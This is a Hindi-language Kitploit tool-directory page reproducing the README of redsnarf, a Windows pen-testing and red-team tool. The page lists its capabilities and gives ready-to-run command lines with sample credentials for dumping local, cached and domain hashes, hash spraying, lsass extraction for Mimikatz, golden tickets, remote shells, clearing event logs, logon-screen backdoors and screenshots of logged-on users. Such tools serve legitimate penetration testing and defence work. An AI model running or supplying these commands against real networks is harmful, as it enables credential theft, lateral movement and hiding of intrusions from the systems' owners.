Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
redsnarf — RedSnarf एक pen-testing / red-teaming टूल है जो Windows वातावरण के लिए है। | Kitploit
उपकरण/GitHubGitHub/nccgroup/redsnarf
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिपेलोड जनरेशनशोषणहैश विश्लेषणपार्श्व आंदोलनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
1.2k235269 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubnccgroup/redsnarf

redsnarf

RedSnarf एक pen-testing / red-teaming टूल है जो Windows वातावरण के लिए है।

रिपॉजिटरी देखेंवेबसाइट

______ .____________ _____
______ \ ____ | / / ____ _____ ____/ \ | // __ \ / __ |_ \ / \ \ __ \ __\
| | \ __// // |/ \ | / __ | | /| |
|
|
/_
>
_ /_______ /_| (__ /| ||
/ / / / / /
[email protected] @redsnarf

GitHub license

RedSnarf एक पेन-टेस्टिंग / रेड-टीमिंग टूल है, जिसे एड विलियम्स द्वारा बनाया गया है। यह OpSec सुरक्षित तकनीकों का उपयोग करके विंडोज वर्कस्टेशन, सर्वर और डोमेन कंट्रोलर से हैश और क्रेडेंशियल प्राप्त करने के लिए है।

वीडियो के लिए हमारा YouTube चैनल देखें https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

RedSnarf की कार्यक्षमता में शामिल हैं:

• स्थानीय SAM हैश प्राप्त करना
• उन्नत सिस्टम विशेषाधिकारों के साथ चल रहे उपयोगकर्ताओं और उनके संबंधित lsa secrets पासवर्ड की गणना करना;
• MS कैश्ड क्रेडेंशियल प्राप्त करना;
• Pass-the-hash;
• कमजोर और अनुमान लगाने योग्य उपयोगकर्ता नाम/पासवर्ड संयोजनों की त्वरित पहचान (डिफ़ॉल्ट administrator/Password01);
• एक सीमा पर हैश प्राप्त करने की क्षमता;
• Hash spraying -
Credsfile pwdump, fgdump और स्पेस से अलग किए गए सादे टेक्स्ट उपयोगकर्ता नाम और पासवर्ड के मिश्रण को स्वीकार करेगा;
• Mimikatz के साथ ऑफलाइन विश्लेषण के लिए Lsass डंप;
• NTDSUtil का उपयोग करके डोमेन कंट्रोलर हैश डंप करना और स्थानीय पार्सिंग के लिए NTDS.dit प्राप्त करना;
• drsuapi विधि का उपयोग करके डोमेन कंट्रोलर हैश डंप करना;
• डोमेन कंट्रोलर से Scripts और Policies फोल्डर प्राप्त करना और 'password' और 'administrator' के लिए पार्स करना;
• cpassword हैश को डिक्रिप्ट करने की क्षमता;
• रिमोट मशीन पर शेल शुरू करने की क्षमता;
• इवेंट लॉग (application, security, setup या system) को साफ करने की क्षमता; (केवल आंतरिक संस्करण)
• विश्लेषण के लिए परिणाम प्रति-होस्ट आधार पर सहेजे जाते हैं।
• रिमोट मशीन पर RDP सक्षम/अक्षम करें।
• रिमोट मशीन पर RDP पोर्ट 3389 से 443 में बदलें।
• रिमोट मशीन पर NLA सक्षम/अक्षम करें।
• पता लगाएं कि उपयोगकर्ता रिमोट मशीनों पर कहाँ लॉग इन हैं।
• Windows लॉगऑन स्क्रीन में बैकडोर डालें
• रिमोट मशीन पर UAC सक्षम/अक्षम करें।
• स्टील्थ mimikatz जोड़ा गया।
• डोमेन हैश का पार्सिंग
• यह निर्धारित करने की क्षमता कि कौन से खाते सक्षम/अक्षम हैं
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप को रिकॉर्ड करें
• Windows CPassword डिक्रिप्ट करें
• WinSCP पासवर्ड डिक्रिप्ट करें
• उपयोगकर्ता SPN प्राप्त करें
• रिमोट मशीनों से WIFI पासवर्ड प्राप्त करें

RedSnarf उपयोग

आवश्यकताएँ:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass प्राप्त करने के लिए procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - स्थानीय रूप से Mimikatz जानकारी पार्स करने में उपयोग किया जाता है

सहायता दिखाएँ
./redsnarf.py -h
./redsnarf.py --help

स्थानीय हैश प्राप्त करें

एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और Security इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC security

एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और application इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC application

एकल मशीन से स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

एकल मशीन से डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

नेटवर्क रेंज पर स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Hash Spraying

नेटवर्क रेंज पर हैश स्प्रे करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

नेटवर्क रेंज पर डोमेन लॉगिन के साथ हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

क्रेडेंशियल की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

उपयोगकर्ता नामों वाली फाइल (-hS) और एक सामान्य पासवर्ड (-hP) की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

डोमेन हैश प्राप्त करें

drsuapi विधि का उपयोग करके हैश प्राप्त करें (सबसे तेज़)
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

NTDSUtil का उपयोग करके हैश प्राप्त करें
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

गोल्डन टिकट उत्पन्न करना
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

सूचना संकलन

डोमेन कंट्रोलर से Policies और Scripts फोल्डर कॉपी करें और password और administrator के लिए पार्स करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Cpassword डिक्रिप्ट करें
./redsnarf.py -uG cpassword

उपयोगकर्ता ढूँढें - लाइव
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

उपयोगकर्ता ढूँढें - ऑफलाइन (पहले से डाउनलोड की गई जानकारी खोजता है)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

NT AUTHORITY\SYSTEM टास्कलिस्ट प्रदर्शित करें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

विविध

स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Mimikatz के साथ ऑफलाइन पार्सिंग के लिए lsass की एक कॉपी प्राप्त करें - स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

स्टील्थ mimikatz चलाएं, यह विकल्प एक वेब-सर्वर शुरू करता है जो एक powershell स्क्रिप्ट प्रदान करता है, यह मशीन साइड पर अस्पष्ट और एन्कोडेड होता है, डेटा डिस्क को नहीं छूता - क्रेडेंशियल को आसानी से पढ़ने योग्य शैली में grep किया जाता है और स्क्रीन पर इको किया जाता है।
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

कस्टम कमांड चलाएं
उदाहरण 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

उदाहरण 2 - डबल कोट्स को \ से एस्केप करना होगा
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

स्थानीय एक्सेस टोकन नीति

टूल डाउनलोड करें